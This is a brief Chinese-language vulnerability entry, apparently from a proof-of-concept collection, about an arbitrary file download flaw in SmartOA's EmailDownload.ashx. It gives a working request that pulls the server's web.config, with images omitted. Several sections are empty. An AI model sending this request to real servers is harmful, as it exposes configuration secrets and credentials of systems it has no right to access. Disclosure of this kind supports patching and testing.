# 智明 SmartOA EmailDownload.ashx 任意文件下载漏洞

# 漏洞描述

智明 SmartOA EmailDownload.ashx文件存在任意文件下载漏洞,通过漏洞可下载服务器上的敏感文件,查看敏感信息

# 漏洞影响


# 网络测绘


# 漏洞复现

登录页面

img

验证POC

/file/EmailDownload.ashx?url=~/web.config&name=web.config
1

img